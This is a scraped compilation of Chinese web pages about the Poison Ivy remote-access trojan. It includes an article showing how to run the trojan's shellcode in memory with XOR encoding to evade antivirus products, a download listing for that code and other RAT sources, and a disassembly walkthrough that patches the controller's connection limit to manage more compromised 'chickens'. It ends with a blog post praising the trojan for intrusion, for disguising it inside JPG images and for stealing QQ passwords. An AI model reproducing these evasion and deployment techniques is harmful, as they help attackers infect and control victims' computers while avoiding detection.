编程免杀Poison Ivy远控[老文] - 推酷
编程免杀Poison Ivy远控[老文]
Poison Ivy是一款非常有名的远控软件，体积小，功能全，但是木秀于林，风必摧之。我下载了Poison Ivy2.3.2版，服务端在生成时立即被杀毒软件杀掉，试了好几种杀软，无一例外，百分百被杀。但Poison Ivy有一个其它远控没有的功能，就是在其生成服务端时可以选择PE或ShellCode两种格式。因此我想是否能够写个程序，专门用以运行生成的 shellcode，以达到
服务端的目的。
首先按照服务端的生成步骤生成一个“C数组”格式的shellcode,然后打开VC++6.0,新建一个Win32 Application项目。项目代码中在主函数之前定义一个数组，将其值赋成开始生成的“C数组”的内容，程序主函数内的代码非常简单：
&&&&&&&&lea&eax,code
&&&&&&&&call&eax
其中code为字符串数组变量名。_asm{ }是C中嵌入
代码的格式。Lea是地址传送指令，功能是将字符串数组code的地址传送到eax寄存器。然后通过Call命令调用，程序即运行了内存中的code代码。
或者采用“((void (*)(void)) &code)();”代码。该代码的作用是把code转换为一个参数为空，返回为空的函数指针并调用，相当于直接执行code变量在内存中的数 据。我认为其中&code是取code的地址，它前面的括号((void (*)(void))是强制类型转换，转换的就是&code。(void(*)void)表示函数的返回类型为void,参数也为void。但为 什么可以用“(void (*)(void)”来转换我也很迷惑，希望哪位大侠告知。
代码编写完成，运行看看效果
成功上线，功能正常。现在得看看免杀效果，我本机安装的是瑞星2010,自动防护和扫描杀毒都顺利通过，
继续用Symantec反病毒软件测试，发现用该方法生成的release版程序被杀，通过调整代码(就一句话也没什么可调的),最后发现将数组定义放到WinMain函数内即可免杀。
采用本文所述方法，可以顺利逃过卡巴斯基、NOD32、Mcafee、AntiVir、熊猫和趋势等主流杀毒软件的查杀。
但对于部分杀软还是无效，我估计可能是这些软件的启发式杀毒根据程序行为来判断的，我相信可以通过进一步的代码调整和变形来达到逃避这些杀软中部分查杀的目的。我
整个免杀代码非常简单，能够调整更改的地方很少，因此我尝试对生成的“C数组格式的shellcode”进行变形，在程序运行过程中再将变形的数组解码为正确的Shellcode,然后再通过变量运行，希望能达到进一步免杀的目的。以下是数组异或还原的代码：
&code[]&=&{
,&……(省略)}&&
//code为异或FF后的shellcode数组
//shellcode数组长度为5747
{&&code1[i]&=&code[i]^
lea&eax,code1&&
call&eax&&
运行生成的可执行文件，很快回连，一切正常。看看测免软的效果，又过了不少杀软。本文撰写和测试与发帖时间相距一段时间，其间各杀软的升级情况不得而知，可能免杀情况略有变化。不过本文旨在讨论免杀方法，在对于“毒药”远控没有源码的情况下采用寥寥几行代码却也达到了过主流杀软的效果。因此我觉得过杀软的思路非常重要,本文技术简单,大家还有什么好方法希望大家不吝赐教。原文地址：/thread-.html
已发表评论数()
请填写推刊名
描述不能大于100个字符!
权限设置： 公开
仅自己可见
正文不准确
标题不准确
排版有问题
主题不准确
没有分页内容
图片无法显示
视频无法显示
与原文不一致PoisonIvy_rar 编程免杀 Ivy远控，主要对流行木马 Ivy的特殊杀软 方法 Windows Develop 238万源代码下载-
&文件名称: PoisonIvy_rar
& & & & &&]
&&所属分类:
&&开发工具: Visual C++
&&文件大小: 42 KB
&&上传时间:
&&下载次数: 140
&&提 供 者:
&详细说明：编程免杀Poison Ivy远控，主要对流行木马Poison Ivy的特殊杀软免杀方法-Programming remote control to avoid killing Poison Ivy, Poison Ivy Trojan mainly pop a special exemption to kill soft-kill method
文件列表(点击判断是否您需要的文件，如果是垃圾请在下面评价投诉):
&&编程免杀Poison Ivy远控代码.rar
&近期下载过的用户:
&相关搜索:
&&&&&&&&&&
&输入关键字，在本站238万海量源码库中尽情搜索：
&[] - vista 下设置某程序绕过uac认证直接执行的代码
&[] - 最近写的一个简单的远控界面，实现了启动页面，系统托盘，列表，tabsheet，换肤功能
&[] - vipPcShare远控代码 VC++6.0写的，大家可以用来交流，也希望大家不要用此代码做不该做的事！
&[] - 国外远控源码，VC++编写，功能强大~~~~
&[] - 过360安全卫士提示，过360提示，干掉360。过360服务提示，免杀好东西啊
&[] - 这份源码戴尔菲远控的全部源码，和现在用的构架完全不一样，放硬盘里也可惜了，抛出来吧...
框架而已，要的自己修改，我懒得管...
不需要保留任何东西。
这是戴尔菲远控框架的最后一次开源了，以后的框架因为日趋稳定，一般不会考虑把老框架抛出来。
&[] - 一个用VB做的远控程序，功能还算不错，而且生成的小马至今还是过国内主流的！
&[] - poison Ivy PluginsPoison Ivy PluginsPoison Ivy PluginsPoison Ivy Plugins
&[] - 一款比较经典的远控源码
经过个人修改之后的版本
&[] - QQ远控任我行是一款完全免费且绿色小巧、无须安装的远程控制软件，并能够渗透到局域中，即网吧、单位、小区中进行控制。当当养“鸡”专业户：pi2.2.0脱壳及连接200限制去除逆向工程
作者：佚名
字体：[ ] 来源：互联网 时间：10-08 19:05:11
【文章标题】: 当当养&鸡&专业户！
【文章作者】: KOOK1991
【作者邮箱】:
【作者QQ号】:
【软件名称】: Poison Ivy 2.2.0
【下载地址】: http://www./
【加壳方式】: 未知
【编写语言】: Bo
【文章标题】: 当当养&鸡&专业户！
【文章作者】: KOOK1991
【作者邮箱】:
【作者QQ号】:
【软件名称】: Poison Ivy 2.2.0
【下载地址】: http://www./
【加壳方式】: 未知
【编写语言】: Borland Delphi 6.0 - 7.0
【使用工具】: OllyICE、LoadPE、ImportREC、Topo
【操作平台】: Win9x/NT/2000/XP
【软件介绍】: 国外知名木马，服务端才几KB，强！
【作者声明】: 我是菜鸟我怕谁！！！
--------------------------------------------------------------------------------
【详细过程】
初中的时候一直认为拥有几千台肉鸡才叫&黑客&。眨眼间，两三年过去了，终于理解了&黑客&的真意，决心来看雪好
好学学。无奈高手太多，使我无地自容，近来偶有感想，便拿出来显摆显摆&&
Poison Ivy，知道吧？很有名气的木马，可就不知道为啥在国内火不起来，但我挺爱用。（受不了一些哥们，这么小的木
马不用，成天背着几百KB的鸽子满天飞&&）好东西总有限制，Poison Ivy 2.2.0也不例外，限制最大连接数为２００。
于是我抄起了家伙，上路了&&
首先，阐述一下这回的破解目标：
对Poison Ivy 2.2.0进行逆向工程，增加自定义最大连接数的功能，以方便我们使用。让更多的人成为养&鸡&专业户，
从而脱贫、致富、奔小康！！！！！！
用PEiD查不出来壳，无奈。直接用OllyICE上，停在入口点：
005A3060 &
81ED 725B4000
ebp, 00405B72
eax, dword ptr fs:[30]
eax, byte ptr [eax 2]
short 005A307F
经验太少，看不出是什么壳:-(直接上。走过005A3060，直接用ESP定律&HE 0012FFA4&，F9运行，卡到这里：
PI.005A36C0
dword ptr fs:[eax]
dword ptr fs:[eax], esp
short 005A371D
dword ptr [eax], eax
byte ptr [eax], al
byte ptr [eax], al
byte ptr [eax], al
byte ptr [eax], al
F8一路向前
byte ptr [eax], 访问违规：正在写入到[]
Shift F8，来到：
ebx, dword ptr [esp]
E8 C78C0200
short 7C92EB0A
E8 11EBFFFF
ZwContinue
short 7C92EB15
E8 3DF7FFFF
ZwRaiseException
Alt F9返回：
byte ptr [eax ], dh
B8 D8975100
E8 1CD0EEFF
A1 ACCF5100
eax, dword ptr [51CFAC]
eax, dword ptr [eax]
E8 1822F7FF
A1 ACCF5100
eax, dword ptr [51CFAC]
eax, dword ptr [eax]
BA 989B5100
edx, 00519B98 ASCII &Poison Ivy&
E8 FF1DF7FF
8B0D 90CE5100
ecx, dword ptr [51CE90] PI.
A1 ACCF5100
eax, dword ptr [51CFAC]
eax, dword ptr [eax]
8B15 E8FB5000
edx, dword ptr [50FBE8] PI.0050FC34
E8 0722F7FF
哈哈，来到OEP，很熟悉的Delphi开头。用LoadPE修正镜像大小，完全Dump。再打开ImportREC，OEP填上00119B38，自动查
找INT -& 获取输入表 -& Fix Dump，脱壳OK~~~~~
为了保险起见，再用PEiD查一下脱壳后的文件――&Borland Delphi 6.0 - 7.0&，呵呵，没错，就是你！！
用Dede打开脱壳后的Poison Ivy，Dede卡住了，看来作者不是吃素的。
只好用OllyICE载入脱壳后的Poison Ivy -& Ultra String Reference -& Find ASCII。看了半天，终于找到了一句有用的
Ultra String Reference, 条目 1813
Address=0051170A
Disassembly=mov
Text String=please assign a password for the connection:
Ultra String Reference, 条目 1814
Address=0051170F
Disassembly=mov
eax, 0051187C
Text String=new connection
直接双击来到这里
68 7E660480
|Cmd = FIONBIO
E8 D7BDF7FF
cal \ioctlsocket
81BB 3C070000&cmp
dword ptr [ebx 73C], 0C8
E8 8DBDF7FF
call \closesocket
E9 F7000000
eax, dword ptr [ebp-C]
8B15 ACF35100 mov
edx, dword ptr [51F3AC]
E8 0632EFFF
803D 9DF35100&cmp
byte ptr [51F39D], 0
ecx, dword ptr [ebp-C]
please assign a password for the connection:
B8 7C185100
eax, 0051187C
new connection
E8 AB41F2FF
ecx, dword ptr [ebp-38]
哈哈，众里寻他千百度，蓦然回首――小样，你在这啊：
81BB 3C00000
dword ptr [ebx 73C], 0C8 比较当前连接数和0C8（就是200嘛）
小于200则跳
E8 8DBDF7FF
call \closesocket 断开连接
可见在005116DF处的C8000000就是最大连接数，记住这个地址，后面有用的哦。
找到了判断最大连接数的地方，可以直接把改成JMP，但有一点，假如你肉鸡太多，岂不被DDos了？看来这点还不
够，我们还得控制最大连接数，也就是让程序随我们的意愿来自动修改005116DF处的最大连接数。考虑了半天，我决定用
Poison Ivy的配置文件Poison Ivy.ini来保存欲设的最大连接数，以便我们在具体应用时方便地修改。
先看看Poison Ivy.ini的内容吧！
[Disclaimer] 软件的启动模式（是否显示使用协议）
[Placement] 软件的窗口及控件的大小设置
MaximizedState=0
Height=231
ConTop=145
ConLeft=110
ConWidth=650
ConHeight=380
Column0=50
Column1=90
Column2=90
Column3=80
Column4=80
Column5=60
Column6=45
Column7=63
Column8=67
Column9=50
Column10=57
DataTransfers=0
[Settings] 很明显是有关控制端的配置信息，就把最大连接数存这吧
ScrSize=75
ScrBits=24
ShareToSocks=
ShareSocks=0
Password=admin
BalloonTip=1
MinimizeTray=1
CloseTray=0
PromptExit=0
SimTransfers=2
SDrounds=3
WindowColor=1
TimestampColor=1
KeynameColor=1
WindowName=008000
Timestamp=0000FF
Keyname=808080
PromptDelete=1
AutoRefresh=0
TreeLayout=1
AutoLookUpdates=1
AutoRemove=1
[Connection] 配置被控端的信息1
DNS=127.0.0.1:3460,
Password=admin
[Startup] 配置被控端的信息2
ActiveXKey={1B4B734A-CC89-9B4A-40104}
[Installation]
CopySystem=1
CopyWindows=0
Keylogger=0
Persistence=0
[Advanced] 配置被控端的信息3
ProcessMutex=)!VoqA.I4
KeyLoggerMutex=VLC9032Ca
CustomInject=0
CustomInjectProc=msnmsgr.exe
我就决定在[Settings]里添加一个子项&Crack&，用它来控制最大连接数，OK，开工！！！！
要在配置文件中添加最大连接数的信息，最重要的就是读出最大连接数，那我没就必须找到程序是如何读配置文件的。重
新回到OllyICE中看String：
Ultra String Reference, 条目 1931
Disassembly=mov
edx, 00514C28
Text String=settings
Ultra String Reference, 条目 2070
Address=0051591E
Disassembly=mov
Text String=settings
其中有很多的Settings，我只选了两处，因为其他的Settings都分布在这两处附近：
B9 5C4C5100
ecx, 00514C5C
sharetosocks
BA 284C5100
edx, 00514C28
eax, dword ptr [ebp-4]
esi, dword ptr [eax]
dword ptr [esi 4]
A0 A7F35100
al, byte ptr [51F3A7]
B9 744C5100
ecx, 00514C74
sharesocks
BA 284C5100
edx, 00514C28
eax, dword ptr [ebp-4]
esi, dword ptr [eax]
dword ptr [esi 14]
A1 7CF35100
eax, dword ptr [51F37C]
B9 884C5100
ecx, 00514C88
BA 284C5100
edx, 00514C28
eax, dword ptr [ebp-4]
esi, dword ptr [eax]
dword ptr [esi C]
A1 ACF35100
eax, dword ptr [51F3AC]
B9 984C5100
ecx, 00514C98
BA 284C5100
edx, 00514C28
eax, dword ptr [ebp-4]
esi, dword ptr [eax]
dword ptr [esi 4]
A0 9AF35100
al, byte ptr [51F39A]
0051591E处：
B9 5C685100
ecx, 0051685C
sharetosocks
eax, dword ptr [ebp-8]
ebx, dword ptr [eax]
dword ptr [ebx]
edx, dword ptr [ebp-5C]
B8 B4F35100
E8 A9EFEEFF
sharesocks
eax, dword ptr [ebp-8]
ebx, dword ptr [eax]
dword ptr [ebx 10]
A2 A7F35100
byte ptr [51F3A7], al
68 840D0000
eax, dword ptr [ebp-8]
ebx, dword ptr [eax]
dword ptr [ebx 8]
A3 7CF35100
dword ptr [51F37C], eax
eax, dword ptr [ebp-60]
B9 A8685100
eax, dword ptr [ebp-8]
ebx, dword ptr [eax]
dword ptr [ebx]
edx, dword ptr [ebp-60]
具体谁是程序开始运行时读取Poison Ivy.ini的地方，不知道。分别下断点，0051591E在开始时断下来，在结束
时断下来，可见0051591E是读取Poison Ivy.ini，是保存Poison Ivy.ini，知道了这些，继续！！
分析一下，程序是如何读取Poison Ivy.ini里的内容的：
68 840D0000
压入默认端口
INI中保存端口信息的子项名称
INI中保存端口信息的项名称
eax, dword ptr [ebp-8]
ebx, dword ptr [eax]
dword ptr [ebx 8]
A3 7CF35100
dword ptr [51F37C],
把读取的值保存到51F37C
处之所以要把默认端口压入，是因为程序怕在读不出配置文件中port这一子项时，使用０来做端口导致出错，可
0D84&的作用是让程序在读不出配置文件该项时采用备用值0D84。
好了，打开Topo差入100字节代码空间，（本人懒得去找了可用空间了，还是用工具吧，100字节肯定够用。）Topo中显示
100字节加到了005A3A33，下面开始添加代码：
首先，用OllyICE二进制编辑005A3A33，加入字符串&Crack&。（别忘了在&Crack&后加&00&。）
接着，在005A3A39处添加我们的代码：
68 840D0000
压入默认最大连接数，保存备用值200
B9 333A5A00
ecx, 005A3A33 ASCII &Crack&
INI中保存最大连接数的子项名称
ASCII &Settings&
INI中保存最大连接数的项名称
eax, dword ptr [ebp-8]
ebx, dword ptr [eax]
dword ptr [ebx 8] 进行读取
A3 DF165100
dword ptr [5116DF], 把读取的最大连接数保存到上文提到的005116DF处，替换原来的最大连接数
方便起见，就让程序从处跳到我们这里吧，即：
68 840D0000
.- E9 04E10800
为了使程序正常运行我们还要在005A3A50的下面加入如下代码：
68 840D0000
把原有功能修改了，最后还是要加上的，所谓&有借有还，再借不难&
- E9 D61EF7FF
回归原位，这就相当于台湾再咋拗，到头还是得回归咱中国，呵呵:-)
OK，用OllyICE保存EXE文件，让我来测试一下&&
打开Poison Ivy.ini在[Settings]下加入Crack=0，呵呵一个也连接不上了。把Crack=0改为10000，哈哈，肉鸡出现了！！
再把Crack=0删除，哦~~~~，肉鸡又出现了！！！！！成功！！！！！
最后，给有对本文兴趣的朋友留个小作业：继续对处进行逆向工程，使程序可以在关闭时自动保存当前的最大连
接数&&OK，就到这把！！！
大家感兴趣的内容
12345678910
最近更新的内容&&&&Poison Ivy 2.3.2脱壳
&Poison Ivy 2.3.2脱壳
Poison Ivy是一款强大的远控，非常黄非常暴力，可以生成10KB以下的服务端，应该是世界上最牛逼的木马，可以不加“之一”。
若举报审核通过，可奖励20下载分
被举报人：
举报的资源分：
请选择类型
资源无法下载
资源无法使用
标题与实际内容不符
含有危害国家安全内容
含有反动色情等内容
含广告内容
版权问题，侵犯个人或公司的版权
*详细原因：
VIP下载&&免积分60元/年（1200次）
您可能还需要
Q.为什么我点的下载下不了，但积分却被扣了
A. 由于下载人数众多，下载服务器做了并发的限制。若发现下载不了，请稍后再试，多次下载是不会重复扣分的。
Q.我的积分不多了，如何获取积分？
A. 获得积分，详细见。
完成任务获取积分。
论坛可用分兑换下载积分。
第一次绑定手机，将获得5个C币，C币可。
关注并绑定CSDNID，送10个下载分
下载资源意味着您已经同意遵守以下协议
资源的所有权益归上传用户所有
未经权益所有人同意，不得将资源中的内容挪作商业或盈利用途
CSDN下载频道仅提供交流平台，并不能对任何下载资源负责
下载资源中如有侵权或不适当内容，
本站不保证本站提供的资源的准确性，安全性和完整性，同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
安全技术下载排行
您当前C币：0&&&可兑换 0 下载积分
兑换下载分:&
消耗C币:0&
立即兑换&&
兑换成功你当前的下载分为 。前去下载资源
你下载资源过于频繁，请输入验证码
如何快速获得积分？
你已经下载过该资源，再次下载不需要扣除积分
Poison Ivy 2.3.2脱壳
所需积分：2
剩余积分：0
扫描微信二维码精彩活动、课程更新抢先知
VIP会员，免积分下载
会员到期时间：日
剩余下载次数：1000
Poison Ivy 2.3.2脱壳
剩余次数：&&&&有效期截止到：
你还不是VIP会员VIP会员享免积分 . 专属通道极速下载
VIP下载次数已满VIP会员享免积分 . 专属通道极速下载，请继续开通VIP会员
你的VIP会员已过期VIP会员享免积分 . 专属通道极速下载，请继续开通VIP会员博客访问： 40808
博文数量： 23
博客积分： 1410
博客等级： 上尉
技术积分： 229
注册时间：
IT168企业级官微
微信号：IT168qiye
系统架构师大会
微信号：SACC2013
分类： 项目管理
&&& 很早以前我就这款木马了，不过当时用的是个很老的版本，前些天在网上下了个2.3.2版的就马上体验了一下，运行以后就明显感觉，这个版本比以前的多了很多东西，画面更简洁，操作也复杂了些，毕竟东西多了，下面我就谈谈在我使用期间我所感觉出来的这款木马的有点和缺陷：&&& &&& 优点：& 首先不得不提生成的服务端，他的服务端7K左右，一般情况下是不会超过12K的，取决于你对服务端所添加的功能，这是我见到的木马服务端中最小的了，还要提的一点是，2.0版的就已经可以突破QQ的键盘锁进而截取QQ密码，超强！&&&&&&&&&&& 这末小的服务端，更方便我们对它进行伪装，比如说，把它用捆绑器和一张JPG图片进行捆绑，一张清晰的JPG都要几十K，多个7K根本不会引起怀疑，用它来制作网页木马更是方便，因为比起那写别的木马优势别提有多大了.另外还有几个比较不错的功能，比如说肉鸡转借和更新服务端等吧。&&& 缺点：& 唉，说道缺点，简直让我无奈了&&&&&&&&&&& 1.&&& 远程屏幕很占对方资源，是对方电脑超卡，无奈了&&&&&&&&&&& 2.&&& 无法穿透防火墙，木马配置过程中可以选择插入的进程，但是选择这项服务端就无法上线了，晕。（我用风云火墙，木马穿不了，我测试的时候好像可以直接穿瑞星火墙）&&&&&&&&&&& 3.&&& 2.3.2版的无法使用键盘记录了，虽然有这个选项，但我测试后的结果是服务端仍然无法上线，狂晕了（还得自己再在对方电脑中装个键盘记录软件）。&&&&&&&&&&& 4.&&& cmdshell中显示的字太小了，我几乎都得使劲把头凑到屏幕跟前，无语。&&&&&&&&&&& 5.&&& 服务端的启动方式单一 （一旦有程序试图加壳运行或者是访问注册表我的风云防火墙首先会拦截该动作并向我举报）&&&&&&&&&&& 6.&&& 功能上还是比较落后的，少了很多时下流行的功能。&&&&&&&&&&& 7.&&& 这条仅对我个人而言，用OD打开会发现，哇塞，一个空白行都没有啊，对于我这个小菜常用的加花免杀，更改文件头，通用跳转法都找不到地方了。（出于本人技术，应该还可以添加个区段，再免杀吧）
&&&&& 综述： 虽然这款外国的马儿身上有很多缺点，但我还是比较喜欢它的，喜欢它的简洁和小巧，我可以用它来做入侵的先潜兵，它成功把对方的大门给我敲出个洞洞来，我就再上大马，就像脚本木马通常用的方法叫“小马传大马”&&&&& 不过呢，我用的是有些问题的免杀版（自己免杀的哦～～），嘿嘿，过卡巴斯基。&
阅读(4518) | 评论(2) | 转发(0) |
相关热门文章
给主人留下些什么吧！~~
：楼主在什么环境下安装的？这个软件我在XP上装，为什么总是报异常？
我是从http://www./index.php?link=download上现在的2.3.2，在XP&SP1上无法安装，一启动就报错。 |
楼主在什么环境下安装的？这个软件我在XP上装，为什么总是报异常？
请登录后评论。